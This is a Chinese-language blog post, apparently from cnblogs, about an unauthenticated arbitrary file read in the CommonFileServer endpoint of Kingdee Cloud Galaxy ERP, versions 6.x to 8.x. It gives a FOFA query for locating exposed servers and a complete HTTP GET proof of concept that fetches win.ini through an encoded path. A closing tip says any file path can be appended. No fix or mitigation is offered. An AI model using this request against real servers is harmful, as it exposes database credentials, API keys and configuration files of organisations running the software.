0x01 产品简介
金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖:财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。
0x02 漏洞概述
由于金蝶云星空CommonFileServer接口处权限设置不当,未经身份认证的攻击者可以利用此漏洞访问服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。
0x03 影响范围
6.x版本、7.x版本、8.x版本(均受影响)
0x04 复现环境
FOFA:app="金蝶云星空-管理中心"
0x05 漏洞复现
POC:
1 2 3 4 5 6 |
GET /CommonFileServer/c% 3 A% 2 Fwindows% 2 Fwin.ini HTTP/ 1.1
Host: your-ip
User-Agent: Mozilla/ 5.0 (Windows NT 10.0 ; Win 64 ; x 64 ) AppleWebKit/ 537.36 (KHTML, like Gecko) Chrome/ 114.0 . 0.0 Safari/ 537.36 Edg/ 114.0 . 1823.79
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
|
PS:漏洞比较简单粗暴,直接在/CommonFileServer/路径后面拼接文件名就行(特殊符号url编码)
标签:星空,金蝶,漏洞,复现,企业,CommonFileServer,读取 From: https://www.cnblogs.com/1zzZ/p/17635724.html